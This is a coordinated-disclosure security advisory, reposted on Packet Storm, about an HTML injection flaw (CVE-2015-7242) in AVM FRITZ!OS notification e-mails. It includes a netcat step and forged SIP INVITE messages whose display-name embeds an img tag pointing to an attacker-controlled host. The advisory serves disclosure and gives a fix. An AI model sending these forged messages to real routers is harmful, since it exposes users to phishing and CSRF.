seeing is believing

AVM FRITZ!OS HTML Injection

AVM FRITZ!OS HTML Injection
Posted Jan 8, 2016
Authored by Dr. Daniel Schliebner | Site ds-develop.de

AVM FRITZ!OS versions prior to 6.30 suffer from an html injection vulnerability.

tags | exploit, xss
advisories | CVE-2015-7242
MD5 | dcd16a580d0499a6e3647aac49072c65

AVM FRITZ!OS HTML Injection

Change Mirror Download

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Security Advisory
=======================================================================
Title: HTML Injection Vulnerability
Product: AVM FRITZ!OS
Vulnerable Version: All versions prior to 6.30
Fixed Version: 6.30
CVE-ID: CVE-2015-7242
Impact: medium
found: 2015-06-02
by: Dr. Daniel Schliebner <mail@ds-develop.de>
http://www.ds-develop.de
=======================================================================

Vendor Description:
- -------------------
"AVM offers a wide range of products for high-speed broadband
connectivity and smart home networking. With the FRITZ! product family,
AVM is a leading manufacturer of broadband devices for ADSL, cable, and
LTE as well as Smart Home products for wireless LAN, DECT, and Powerline
in Germany and Europe. The FRITZ!Box is the best known brand for
wireless routers in Germany. In 2014 the communications specialist had
500 employees and generated a turnover of 340 million euros."
(http://en.avm.de/about-avm/)


Vulnerability Description:
- --------------------------
Current FRITZ!Box router with supported VoIP functionality have open
port 5060 in order to send and receive SIP messages for ip telephony. In
order to get noticed for incoming calls in absence, many such FRITZ!Box
can be set up to send notice e-mails to a user with the callers phone
number and its display-name (if given) inserted into the e-mail.

Due to intrinsic problems with SIP communication, a user agent client
(UAC), however, needs not to perform a VoIP call by using registrars but
can simply initiate an SIP call to another UAC which then has the role
of a user agent server (UAS).

When the UAC sends an INVITE message to the UAS coming with a valid
phone number, it initiates a ringing on the UAS. In this case, the
FRITZ!Box will send a notification e-mail as described above. It uses
the display-name and the phone number specified in the From: header for
the "who has called" information in the notification e-mail. However,
these information are not properly escaped so forged display-names will
be inserted invalidated into the e-mail.

This vulnerability can be exploited to perform e.g. CSRF attacks on the
client or similar by embedding <img> or <a> tags into the display-name
with an src attribute pointing to some malicious destination.

However, the good news is that attackers need to be creative here since
the length of the display-name is limited to 20 characters so the
embedded HTML code needs to be very short. Using appropriate, very short
URLs, however, can still be used to exploit this vulnerability in a
serious manner.

Informally, a possible attack would look as follows.

We start by finding a valid user's phone number by trying SIP OPTIONS
messages on the FRITZ!Box until we receive a

SIP/2.0 200 OK

response. We thus obtain the phone number and can send the forged INVITE
SIP message to the FRITZ!Box. As a result, the notification e-mail to
the end user will contain the unescaped sender's FROM display-name and
hence possibly embedded HTML code.


Proof of concept:
- -----------------
Assume a FRITZ!Box with WAN address 80.0.0.0 and an IP phone with number
493012345678 setup.

Step 1:
Initiate TCP connection to FRITZ!Box on port 5060, e.g. using Netcat:

$ nc 80.0.0.0 5060

Step 2:
Send forged SIP INVITE message as follows:

INVITE sip:493012345678@80.0.0.0 SIP/2.0
To: Alice <sip:493012345678@80.0.0.0>;tag=123
From: "<a href='#'>Bob</a>" <sip:4930111111111@sip.net>;tag=456
Call-ID: abc@foo.com
CSeq: 123456 INVITE
Via: SIP/2.0/TCP 80.0.0.0;branch=FOO
Content-Length: 0


Exploit:
- --------
In order to exploit the vulnerability, an attacker needs, for instance,
to insert a HTML tag which is short enough for an appropriate URL to be
inserted. An example would be for instance

INVITE sip:493012345678@80.0.0.0 SIP/2.0
To: Alice <sip:493012345678@80.0.0.0>;tag=123
From: "<img src=http:c.to>" <sip:4930111111111@sip.net>;tag=456
Call-ID: abc@foo.com
CSeq: 123456 INVITE
Via: SIP/2.0/TCP 80.0.0.0;branch=FOO
Content-Length: 0

The site c.to is here assumed to be either compromised by the attacker,
too, or under its control. In this case the attacker then can, for
instance redirect the user to another URL with malicious code or
using other exploits, e.g. the recent RCE/CSRF vulnerability in
FRITZ!OS, see [2], related to FRITZ!OS prior to 6.30.


Vulnerable / tested versions:
- -----------------------------
Fritz!Box 7390 with FRITZ!OS 6.24
Fritz!Box 7360 SL with FRITZ!OS 6.20


Vendor contact timeline:
- ------------------------
2015-06-02: Contacting vendor through info@avm.de
2015-06-04: Vendor response - vulnerability will be forwarded
2015-06-04: Vendor response - issue has now the incident-ID CID4191652
2015-06-05: Vulnerability advisory sent to vendor
2015-06-04: Vendor response - issue will be fixed
2015-07-01: Vendor response - Issue is fixed in upcoming Fritz!OS
06.25-30758
2015-07-13: Status update - Fritz!OS 6.30 deployment begin
2015-09-21: Contacted vendor to ask for deployment status of update
2015-09-22: Vendor response - update not currently deployed for all products
2016-01-07: Coordinated release of the security advisory


Solution:
- ---------
Escape HTML entities within the display-name in the From: header or do
not allow other characters than [a-z0-9\s] within the display-name.


References
- ----------
[1] https://avm.de/service/sicherheitshinweise/
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2015-001


URL
- ---
http://ds-develop.de/advisories/advisory-2016-01-07-1-avm.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQEcBAEBAgAGBQJWjqgtAAoJEFA4WIKLTb8OS3YH/1WuuyJw5h1JZjBEW78lz23f
4sy2n3XLBlQG5deVSjVYH1j6Sbh//5rcn0vUS12jOndOVJjtkgc8eZuM+Vsh5NXn
qnzagwMZXSeY5mnx6w5UQqzcX4XFv4gTuDzDCfYfqnnwHGHVU6zxuN09hSmGwGBO
psmuZCNTT9eT1BnJRYib7sPXBEBOzu+0AeL/sNuz84kIXeRbWjthaNPYCbdGMo62
QFxxltJvnpx18LVmcpJ6bfFfnDSFWT3GFANjBJSdhvR71QcUaArJ6nDADxT/ZE/A
eyH1IC0h5pbdUzbi2CdaPq2tdzPxHAYJJHjzX/pLkFgJgbAiWpvG5YVaCw7CWGc=
=27k0
-----END PGP SIGNATURE-----

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close